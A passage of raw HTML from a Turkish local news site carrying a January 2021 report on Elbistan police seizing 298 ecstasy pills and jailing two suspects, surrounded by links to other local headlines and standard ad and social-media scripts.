Kızılderililerin sıra dışı dünyasını keşfedecek</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/ogrenciler-hedefi-12den-vurmak-icin-yaristi-h38434.html" title="Öğrenciler hedefi 12’den vurmak için yarıştı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/ogrenciler_hedefi_12den_vurmak_icin_yaristi.jpg" alt="Öğrenciler hedefi 12’den vurmak için yarıştı" /> Öğrenciler hedefi 12’den vurmak için yarıştı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/piazzada-indirim-yarisi-h35825.html" title="Piazza’da indirim yarışı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/08/piazzada_indirim_yarisi.jpg" alt="Piazza’da indirim yarışı" /> Piazza’da indirim yarışı</a> </div> </div></div> </div> </div> </div> </div> <div id="mainContainer" class="container center shadow" style="padding-top:15px;"> <img src="http://www.elbistaninsesi.com/images/aboneol.jpg" width="937" height="45" /><br> <br> <!-- Üst Manşet --> <div id="ustkisim" class="row"> <div class="span12 reklam reklam106"><a href="http://www.elbistaninsesi.com/banner.php?id=136" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/thumb.php?src=http://www.elbistaninsesi.com/images/banner/YaYam_Hastanesi_980.jpg&w=980&h=250&q=90" width="980" height="250" style="width:980px;height: 250px;border:0" alt="banner136" /></a></div> <div id="ustmanset" class="span12"> <div class="row-fluid"> <ul class="thumbnails five"> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/ak-parti-ve-mhpden-ortak-aciklama-h68948.html" title="AK Parti ve MHP’den ortak açıklama" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2021/01/Ysimsiz-1_5.jpg" alt="AK Parti ve MHP’den ortak açıklama" class="pull-left" /> <div class="caption-line"><p>AK Parti ve MHP’den ortak...</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/ozer-ve-sahinden-mehmet-gocere-gazeteciler-gunu-ziyareti-h68942.html" title="Özer ve Şahin’den Mehmet Göçer’e Gazeteciler Günü ziyareti" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2021/01/Ysimsiz-1_4.jpg" alt="Özer ve Şahin’den Mehmet Göçer’e Gazeteciler Günü ziyareti" class="pull-left" /> <div class="caption-line"><p>Özer ve Şahin’den Mehmet Göçer’e...</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/elbistan-belediyesi-1sinif-atik-getirme-merkezi-kuruyor-h68920.html" title="Elbistan Belediyesi, 1.Sınıf Atık Getirme Merkezi kuruyor" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2021/01/WhatsApp_Image_2021-01-08_at_13.56.53.jpeg" alt="Elbistan Belediyesi, 1.Sınıf Atık Getirme Merkezi kuruyor" class="pull-left" /> <div class="caption-line"><p>Elbistan Belediyesi, 1.Sınıf Atık Getirme...</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/oztunctan-80-bin-donum-arazi-icin-kar-sularinin-birikecegi-golet-talebi-h68919.html" title="Öztunç’tan 80 bin dönüm arazi için kar sularının birikeceği gölet talebi" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2021/01/oztunc_golet_talebi.jpg" alt="Öztunç’tan 80 bin dönüm arazi için kar sularının birikeceği gölet talebi" class="pull-left" /> <div class="caption-line"><p>Öztunç’tan 80 bin dönüm arazi...</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/baskan-gurbuz-asil-sorun-bisiklet-yolu-degil-parklanma-h68914.html" title="Başkan Gürbüz: “Asıl sorun bisiklet yolu değil, parklanma”" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2021/01/Ysimsiz-1_3.jpg" alt="Başkan Gürbüz: “Asıl sorun bisiklet yolu değil, parklanma”" class="pull-left" /> <div class="caption-line"><p>Başkan Gürbüz: “Asıl sorun bisiklet...</p></div> </a> </li> </ul> </div> </div> <div class="span12 reklam reklam109"><script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- kaynarca --> <ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-3633419220222736" data-ad-slot="5807534991" data-ad-format="auto" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script> </div> </div> <!-- MAIN --> <div class="row"> <div class="page-header-fixed style hide"> <div class="title"></div> <div class="pull-right"> <span class="scroll-link d-goto" id="yorumyaplink" style="margin-right: 15px;"><i class="halflings-icon comments"></i> Yorum Yap</span> <a class="print d-print" href="javascript:window.print()" style="margin-right: 15px;"><i class="halflings-icon print"></i> Yazdır</a> <a href="javascript:void(0);" onclick="shareFacebook(gsTitle, gsUrl);" class="d-share" rel="nofollow" style="margin-right: 15px;"><i class="halflings-icon share-alt"></i> <b>Facebook</b>'ta Paylaş</a> </div> </div> <!-- Sol Blok --> <div id="main" class="span8"> <div class="reklam reklam129"><a href="http://www.elbistaninsesi.com/banner.php?id=162" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/thumb.php?src=http://www.elbistaninsesi.com/images/banner/balYk_dunyasY.jpg&w=600&h=200&q=90" width="600" height="200" style="width:600px;height: 200px;border:0" alt="banner162" /></a></div> <article id="haber"> <div class="page-header clearfix"> <h1 class="title gs-title" itemprop="name">298 adet ecstasy hapla yakalanan zehir tacirleri tutuklandı</h1> <h2 class="lead" itemprop="description"><strong>Elbistan İlçe Emniyet Müdürlüğü ekiplerince bir otomobilde ele geçirilen 298 adet ectasy hapla ilgili olarak yakalanan 3 şüpheliden 2’si çıkarıldıkları mahkemece tutuklandı.</strong></h2> </div> <div class="row-fluid muted"> <p class="pull-left"><span itemprop="datePublished" class="tarih-degistir" data-date="2021-01-11 15:02:24" content="2021-01-11T15:02:24+02:00">11 Ocak 2021 Pazartesi 15:02</span></p> </div> <div class="row-fluid newspic"> <span> <img src="http://www.elbistaninsesi.com/images/haberler/2021/01/298_adet_ecstasy_hapla_yakalanan_zehir_tacirleri_tutuklandi_h68941_29783.jpg" alt="298 adet ecstasy hapla yakalanan zehir tacirleri tutuklandı" itemprop="image"/> </span> </div> <div class="row-fluid page-social"> <div class="span9"> <div class="shr"> <div class="gs-share"> <a class="gs-twitter"></a> <a class="gs-facebook"></a> <a class="gs-linkedin"></a> <a class="gs-google"></a> <div class="fb-like" data-href="http://www.elbistaninsesi.com/guncel/298-adet-ecstasy-hapla-yakalanan-zehir-tacirleri-tutuklandi-h68941.html" data-width="100" data-layout="button_count" data-action="like" data-show-faces="true" data-share="true"></div> </div> <div id="fb-root"></div> <script>(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/tr_TR/all.js#xfbml=1"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk'));</script> </div> </div> <div class="span3 karakterislem secilemez"> <i class="glyphicons-icon text_smaller"></i> <i class="glyphicons-icon text_bigger"></i> <i class="glyphicons-icon font"></i> <a class="print" href="javascript:window.print()"><i class="glyphicons-icon print"></i></a> </div> </div> <div id="newstext" class="row-fluid page-content"> <div class="reklam reklam135 text-center"><a href="http://www.elbistaninsesi.com/banner.php?id=43" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/images/banner/rehber_emlak_son_1.gif" width="600" height="200" style="width:600px;height: 200px;border:0" alt="banner43" /></a></div> <div itemprop="articleBody" id="newsbody"><p class="MsoNormal" style="text-indent:7.1pt"><span style="font-size: 16px;"><span style="font-family: Arial, sans-serif;">Edinilen bilgiye göre, Elbistan İlçe Emniyet Müdürlüğü ekipleri, bir otomobilde yüklü miktarda uyuşturucu madde bulunduğu ihbarı üzerine harekete geçti. Marka ve modeli belirlenen otomobil, Cumhuriyet Mahallesi Sanat Okulu Caddesi’nde durduruldu. Araçta yapılan aramada 298 adet ecstasy hap ele geçirildi. Uyuşturucu haplarla ilgili olarak E.Z, A.B. ve S.A isimli şahıslar gözaltına alındı. Şüpheliler, Narkotik Suçlarla Mücadele Grup Amirliği’ndeki işlemlerinin ardından Elbistan Adliyesi’ne sevk edildi. Burada mahkeme çıkarılan şüphelilerden E.Z. ve B.A. tutuklanırken; diğer şüpheli ise adli kontrol şartı ile serbest bırakıldı.</span></span><span style="font-size:10.0pt;&#10;font-family:&quot;Arial&quot;,sans-serif"><p></p></span></p> <p class="MsoNormal" style="text-indent:7.1pt"><span style="font-size: 16px;"><span style="font-family: Arial, sans-serif;">Tutuklanan şüpheliler, Elbistan E Tipi Kapalı Ceza İnfaz Kurumu’na gönderildi.<br/> <br/> <img src="/images/upload/uyu&#x15F;turucu operasyonu (2)_001.jpg" width="640" height="480" alt=""></img></span></span><span style="font-size:10.0pt;&#10;font-family:&quot;Arial&quot;,sans-serif"><p></p></span></p> <p class="MsoNormal" style="text-indent:7.1pt"><span style="font-size: 16px;"><span style="font-family: Arial, sans-serif;"><p> </p></span></span><span style="font-size:10.0pt;&#10;font-family:&quot;Arial&quot;,sans-serif"><p></p></span></p></div> </div> <br> <div class="box ilgili"> <div class="box header black"> <a href="#"><h5 class="glyphicons fire">Yerel Manşetler</h5></a> </div> </article> <div class="hide-print"> <div id="anamanset" class="carousel hs-manset slid"> <ol class="carousel-indicators twentyfive carousel-hover"> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/ak-parti-ve-mhpden-ortak-aciklama-h68948.html'; return false;" data-target="#anamanset" data-slide-to="0" class="active">1</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/ikizpinardan-yol-genisletme-tesekkuru-h68947.html'; return false;" data-target="#anamanset" data-slide-to="1" >2</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistanspora-destek-icin-acilmisti-kapatma-karari-alindi-h68946.html'; return false;" data-target="#anamanset" data-slide-to="2" >3</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/ozer-ve-sahinden-mehmet-gocere-gazeteciler-gunu-ziyareti-h68942.html'; return false;" data-target="#anamanset" data-slide-to="3" >4</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/298-adet-ecstasy-hapla-yakalanan-zehir-tacirleri-tutuklandi-h68941.html'; return false;" data-target="#anamanset" data-slide-to="4" >5</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/ak-partiden-calisan-gazeteciler-gunu-ziyareti-h68940.html'; return false;" data-target="#anamanset" data-slide-to="5" >6</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/kosebalan-ve-yikansiz-gecen-gazeteciler-gunu-h68939.html'; return false;" data-target="#anamanset" data-slide-to="6" >7</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/toplu-ulasima-zam-h68935.html'; return false;" data-target="#anamanset" data-slide-to="7" >8</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/gurbuz-aciz-sovunuza-ve-magazin-siyasetinize-araci-olmayacagim-h68934.html'; return false;" data-target="#anamanset" data-slide-to="8" >9</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/baskan-general-degisen-kredi-faiz-ve-sartlarini-acikladi-h68930.html'; return false;" data-target="#anamanset" data-slide-to="9" >10</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/kaymakam-demirden-10-ocak-calisan-gazeteciler-gunu-mesaji-h68928.html'; return false;" data-target="#anamanset" data-slide-to="10" >11</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/baskan-deveboynundan-10-ocak-calisan-gazeteciler-gunu-mesaji-h68933.html'; return false;" data-target="#anamanset" data-slide-to="11" >12</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/baskan-gurbuzden-10-ocak-calisan-gazeteciler-gunu-mesaji-h68927.html'; return false;" data-target="#anamanset" data-slide-to="12" >13</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/iyi-partiden-basin-aciklamasi-h68926.html'; return false;" data-target="#anamanset" data-slide-to="13" >14</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/jandarmadan-tarihi-eser-operasyonu-satmak-isterken-yakalandilar-h68925.html'; return false;" data-target="#anamanset" data-slide-to="14" >15</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistan-belediyesinden-basin-aciklamasi-h68924.html'; return false;" data-target="#anamanset" data-slide-to="15" >16</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/oz-elbistan-seyahatten-isten-cikarilma-paylasimlariyla-ilgili-aciklama-h68922.html'; return false;" data-target="#anamanset" data-slide-to="16" >17</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistan-belediyesi-1sinif-atik-getirme-merkezi-kuruyor-h68920.html'; return false;" data-target="#anamanset" data-slide-to="17" >18</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/oztunctan-80-bin-donum-arazi-icin-kar-sularinin-birikecegi-golet-talebi-h68919.html'; return false;" data-target="#anamanset" data-slide-to="18" >19</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/usulsuz-avlanan-2-sahsa-idari-para-cezasi-kesildi-h68918.html'; return false;" data-target="#anamanset" data-slide-to="19" >20</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/sar-dagi-avcilar-derneginden-avci-egitim-kursu-h68917.html'; return false;" data-target="#anamanset" data-slide-to="20" >21</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/baskan-gurbuz-asil-sorun-bisiklet-yolu-degil-parklanma-h68914.html'; return false;" data-target="#anamanset" data-slide-to="21" >22</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistani-kaplamisti-adinda-radyasyon-olmasi-korkuttu-h68913.html'; return false;" data-target="#anamanset" data-slide-to="22" >23</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/hemde-yuz-yuze-egitim-basliyor-h68912.html'; return false;" data-target="#anamanset" data-slide-to="23" >24</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/ziraat-odasindan-ciftcilere-sahte-gubre-uyarisi-h68911.html'; return false;" data-target="#anamanset" data-slide-to="24" >25</li> </ol> <div class="carousel-inner"> <div class="item active"> <a href="http://www.elbistaninsesi.com/guncel/ak-parti-ve-mhpden-ortak-aciklama-h68948.html" title="AK Parti ve MHP’den ortak açıklama"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/01/ak_parti_ve_mhpden_ortak_aciklama_h68948_14671.jpg" alt="AK Parti ve MHP’den ortak açıklama" /> <div class="carousel-caption"> <h2> <span style="font-size:">AK Parti ve MHP’den ortak açıklama</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/ikizpinardan-yol-genisletme-tesekkuru-h68947.html" title="İkizpınar’dan yol genişletme teşekkürü"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/01/ikizpinardan_yol_genisletme_tesekkuru_h68947_97357.jpg" alt="İkizpınar’dan yol genişletme teşekkürü" /> <div class="carousel-caption"> <h2> <span style="font-size:">İkizpınar’dan yol genişletme teşekkürü</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/elbistanspora-destek-icin-acilmisti-kapatma-karari-alindi-h68946.html" title="Elbistanspor’a destek için açılmıştı, kapatma kararı alındı"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/01/elbistanspora_destek_icin_acilmisti_kapatma_karari_alindi_h68946_6543a.jpg" alt="Elbistanspor’a destek için açılmıştı, kapatma kararı alındı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Elbistanspor’a destek için açılmıştı, kapatma kararı alındı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/ozer-ve-sahinden-mehmet-gocere-gazeteciler-gunu-ziyareti-h68942.html" title="Özer ve Şahin’den Mehmet Göçer’e Gazeteciler Günü ziyareti"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/01/ozer_ve_sahinden_mehmet_gocere_gazeteciler_gunu_ziyareti_h68942_3b75d.jpg" alt="Özer ve Şahin’den Mehmet Göçer’e Gazeteciler Günü ziyareti" /> <div class="carousel-caption"> <h2> <span style="font-size:">Özer ve Şahin’den Mehmet Göçer’e Gazeteciler Günü ziyareti</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/298-adet-ecstasy-hapla-yakalanan-zehir-tacirleri-tutuklandi-h68941.html" title="298 adet ecstasy hapla yakalanan zehir tacirleri tutuklandı"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/01/298_adet_ecstasy_hapla_yakalanan_zehir_tacirleri_tutuklandi_h68941_29783.jpg" alt="298 adet ecstasy hapla yakalanan zehir tacirleri tutuklandı" /> <div class="carousel-caption"> <h2> <span style="font-size:">298 adet ecstasy hapla yakalanan zehir tacirleri tutuklandı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/ak-partiden-calisan-gazeteciler-gunu-ziyareti-h68940.html" title="AK Parti’den Çalışan Gazeteciler Günü ziyareti"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/01/ak_partiden_calisan_gazeteciler_gunu_ziyareti_h68940_9d22d.jpg" alt="AK Parti’den Çalışan Gazeteciler Günü ziyareti" /> <div class="carousel-caption"> <h2> <span style="font-size:">AK Parti’den Çalışan Gazeteciler Günü ziyareti</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/kosebalan-ve-yikansiz-gecen-gazeteciler-gunu-h68939.html" title="Kösebalan ve Yıkansız geçen gazeteciler günü"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/01/kosebalan_ve_yikansiz_gecen_gazeteciler_gunu_h68939_c5b3d.jpg" alt="Kösebalan ve Yıkansız geçen gazeteciler günü" /> <div class="carousel-caption"> <h2> <span style="font-size:">Kösebalan ve Yıkansız geçen gazeteciler günü</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/toplu-ulasima-zam-h68935.html" title="Toplu ulaşıma zam"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/01/toplu_ulasima_zam_h68935_b6791.jpg" alt="Toplu ulaşıma zam" /> <div class="carousel-caption"> <h2> <span style="font-size:">Toplu ulaşıma zam</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/gurbuz-aciz-sovunuza-ve-magazin-siyasetinize-araci-olmayacagim-h68934.html" title="Gürbüz: “Aciz şovunuza ve magazin siyasetinize aracı olmayacağım”"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/01/gurbuz_aciz_sovunuza_ve_magazin_siyasetinize_araci_olmayacagim_h68934_5d692.jpg" alt="Gürbüz: “Aciz şovunuza ve magazin siyasetinize aracı olmayacağım”" /> <div class="carousel-caption"> <h2> <span style="font-size:">Gürbüz: “Aciz şovunuza ve magazin siyasetinize aracı olmayacağım”</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/baskan-general-degisen-kredi-faiz-ve-sartlarini-acikladi-h68930.html" title="Başkan General, değişen kredi faiz ve şartlarını açıkladı"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/01/baskan_general_degisen_kredi_faiz_ve_sartlarini_acikladi_h68930_0619b.jpg" alt="Başkan General, değişen kredi faiz ve şartlarını açıkladı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Başkan General, değişen kredi faiz ve şartlarını açıkladı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/kaymakam-demirden-10-ocak-calisan-gazeteciler-gunu-mesaji-h68928.html" title="Kaymakam Demir’den 10 Ocak Çalışan Gazeteciler Günü mesajı"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/01/kaymakam_demirden_10_ocak_calisan_gazeteciler_gunu_mesaji_h68928_7098a.jpg" alt="Kaymakam Demir’den 10 Ocak Çalışan Gazeteciler Günü mesajı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Kaymakam Demir’den 10 Ocak Çalışan Gazeteciler Günü mesajı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/baskan-deveboynundan-10-ocak-calisan-gazeteciler-gunu-mesaji-h68933.html" title="Başkan Deveboynu’ndan 10 Ocak Çalışan Gazeteciler Günü mesajı"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/01/baskan_deveboynundan_10_ocak_calisan_gazeteciler_gunu_mesaji_h68933_bf446.jpg" alt="Başkan Deveboynu’ndan 10 Ocak Çalışan Gazeteciler Günü mesajı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Başkan Deveboynu’ndan 10 Ocak Çalışan Gazeteciler Günü mesajı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/baskan-gurbuzden-10-ocak-calisan-gazeteciler-gunu-mesaji-h68927.html" title="Başkan Gürbüz’den 10 Ocak Çalışan Gazeteciler Günü mesajı"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/01/baskan_gurbuzden_10_ocak_calisan_gazeteciler_gunu_mesaji_h68927_f42bc.jpeg" alt="Başkan Gürbüz’den 10 Ocak Çalışan Gazeteciler Günü mesajı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Başkan Gürbüz’den 10 Ocak Çalışan Gazeteciler Günü mesajı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/iyi-partiden-basin-aciklamasi-h68926.html" title="İYİ Parti’den basın açıklaması"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/01/iyi_partiden_basin_aciklamasi_h68926_7a2a8.jpg" alt="İYİ Parti’den basın açıklaması" /> <div class="carousel-caption"> <h2> <span style="font-size:">İYİ Parti’den basın açıklaması</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/jandarmadan-tarihi-eser-operasyonu-satmak-isterken-yakalandilar-h68925.html" title="Jandarmadan tarihi eser operasyonu, satmak isterken yakalandılar"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/01/jandarmadan_tarihi_eser_operasyonu_satmak_isterken_yakalandilar_h68925_c7d3a.jpg" alt="Jandarmadan tarihi eser operasyonu, satmak isterken yakalandılar" /> <div class="carousel-caption"> <h2> <span style="font-size:">Jandarmadan tarihi eser operasyonu, satmak isterken yakalandılar</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/elbistan-belediyesinden-basin-aciklamasi-h68924.html" title="Elbistan Belediyesi’nden basın açıklaması"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/01/elbistan_belediyesinden_basin_aciklamasi_h68924_5a24b.jpeg" alt="Elbistan Belediyesi’nden basın açıklaması" /> <div class="carousel-caption"> <h2> <span style="font-size:">Elbistan Belediyesi’nden basın açıklaması</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/oz-elbistan-seyahatten-isten-cikarilma-paylasimlariyla-ilgili-aciklama-h68922.html" title="Öz Elbistan Seyahat’ten işten çıkarılma paylaşımlarıyla ilgili açıklama"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/01/oz_elbistan_seyahatten_isten_cikarilma_paylasimlariyla_ilgili_aciklama_h68922_ddeeb.JPG" alt="Öz Elbistan Seyahat’ten işten çıkarılma paylaşımlarıyla ilgili açıklama" /> <div class="carousel-caption"> <h2> <span style="font-size:">Öz Elbistan Seyahat’ten işten çıkarılma paylaşımlarıyla ilgili açıklama</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/elbistan-belediyesi-1sinif-atik-getirme-merkezi-kuruyor-h68920.html" title="Elbistan Belediyesi, 1.Sınıf Atık Getirme Merkezi kuruyor"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/01/elbistan_belediyesi_1sinif_atik_getirme_merkezi_kuruyor_h68920_29a11.jpeg" alt="Elbistan Belediyesi, 1.Sınıf Atık Getirme Merkezi kuruyor" /> <div class="carousel-caption"> <h2> <span style="font-size:">Elbistan Belediyesi, 1.Sınıf Atık Getirme Merkezi kuruyor</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/oztunctan-80-bin-donum-arazi-icin-kar-sularinin-birikecegi-golet-talebi-h68919.html" title="Öztunç’tan 80 bin dönüm arazi için kar sularının birikeceği gölet talebi"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/01/oztunctan_80_bin_donum_arazi_icin_kar_sularinin_birikecegi_golet_talebi_h68919_3db2d.jpg" alt="Öztunç’tan 80 bin dönüm arazi için kar sularının birikeceği gölet talebi" /> <div class="carousel-caption"> <h2> <span style="font-size:">Öztunç’tan 80 bin dönüm arazi için kar sularının birikeceği gölet talebi</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/usulsuz-avlanan-2-sahsa-idari-para-cezasi-kesildi-h68918.html" title="Usulsüz avlanan 2 şahsa idari para cezası kesildi"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/01/usulsuz_avlanan_2_sahsa_idari_para_cezasi_kesildi_h68918_e7838.jpg" alt="Usulsüz avlanan 2 şahsa idari para cezası kesildi" /> <div class="carousel-caption"> <h2> <span style="font-size:">Usulsüz avlanan 2 şahsa idari para cezası kesildi</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/sar-dagi-avcilar-derneginden-avci-egitim-kursu-h68917.html" title="Şar Dağı Avcılar Derneği’nden avcı eğitim kursu"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/01/sar_dagi_avcilar_derneginden_avci_egitim_kursu_h68917_a1462.jpg" alt="Şar Dağı Avcılar Derneği’nden avcı eğitim kursu" /> <div class="carousel-caption"> <h2> <span style="font-size:">Şar Dağı Avcılar Derneği’nden avcı eğitim kursu</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/baskan-gurbuz-asil-sorun-bisiklet-yolu-degil-parklanma-h68914.html" title="Başkan Gürbüz: “Asıl sorun bisiklet yolu değil, parklanma”"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/01/baskan_gurbuz_asil_sorun_bisiklet_yolu_degil_parklanma_h68914_fbde6.jpg" alt="Başkan Gürbüz: “Asıl sorun bisiklet yolu değil, parklanma”" /> <div class="carousel-caption"> <h2> <span style="font-size:">Başkan Gürbüz: “Asıl sorun bisiklet yolu değil, parklanma”</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/elbistani-kaplamisti-adinda-radyasyon-olmasi-korkuttu-h68913.html" title="Elbistan’ı kaplamıştı, adında ‘radyasyon’ olması korkuttu"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/01/elbistani_kaplamisti_adinda_radyasyon_olmasi_korkuttu_h68913_21895.jpg" alt="Elbistan’ı kaplamıştı, adında ‘radyasyon’ olması korkuttu" /> <div class="carousel-caption"> <h2> <span style="font-size:">Elbistan’ı kaplamıştı, adında ‘radyasyon’ olması korkuttu</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/hemde-yuz-yuze-egitim-basliyor-h68912.html" title="HEM’de yüz yüze eğitim başlıyor"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/01/hemde_yuz_yuze_egitim_basliyor_h68912_f44c4.jpg" alt="HEM’de yüz yüze eğitim başlıyor" /> <div class="carousel-caption"> <h2> <span style="font-size:">HEM’de yüz yüze eğitim başlıyor</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/ziraat-odasindan-ciftcilere-sahte-gubre-uyarisi-h68911.html" title="Ziraat Odası’ndan çiftçilere sahte gübre uyarısı"> <img src="http://www.elbistaninsesi.com/images/haberler/2021/01/ziraat_odasindan_ciftcilere_sahte_gubre_uyarisi_h68911_b72c7.jpg" alt="Ziraat Odası’ndan çiftçilere sahte gübre uyarısı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Ziraat Odası’ndan çiftçilere sahte gübre uyarısı</span> </h2> </div> </a> </div> </div> <a class="carousel-control left" href="#anamanset" data-slide="prev">&lsaquo;</a> <a class="carousel-control right" href="#anamanset" data-slide="next">&rsaquo;</a> </div> </div> <div class="row-fluid galleries"> <div class="title"> <span>İlgili Galeriler</span><hr> </div> <div class="content"> <div class="span3"> <a href="http://www.elbistaninsesi.com/elbistan-tarihi-organizeye-ev-sahipligi-yapti-resimleri,38.html" title="Elbistan, tarihi organizeye ev sahipliği yaptı"> <img src="http://www.elbistaninsesi.com/images/album/thumbs/DSC_5431.jpg" alt="Elbistan, tarihi organizeye ev sahipliği yaptı" /> <b>Elbistan, tarihi organizeye ev sahipliği yaptı</b> </a> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/donatir-mobilyadan-hediye-yagmuru-resimleri,37.html" title="Donatır Mobilya’dan hediye yağmuru"> <img src="http://www.elbistaninsesi.com/images/album/thumbs/donatYr_mobilya_cekiliY_1.jpg" alt="Donatır Mobilya’dan hediye yağmuru" /> <b>Donatır Mobilya’dan hediye yağmuru</b> </a> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/otomobilde-yanarak-can-verdiler-resimleri,36.html" title="Otomobilde yanarak can verdiler"> <img src="http://www.elbistaninsesi.com/images/album/thumbs/DSC_8860.jpg" alt="Otomobilde yanarak can verdiler" /> <b>Otomobilde yanarak can verdiler</b> </a> </div> </div> </div> <div id="yorumyap" style="margin:0"></div> <div class="row-fluid keywords"><div class="title">Anahtar Kelimeler:</div><a href="http://www.elbistaninsesi.com/haberleri/298+adet+ecstasy+hapla+yakalanan+zehir+tacirleri+tutukland%C4%B1" title="298 Adet Ecstasy Hapla Yakalanan Zehir 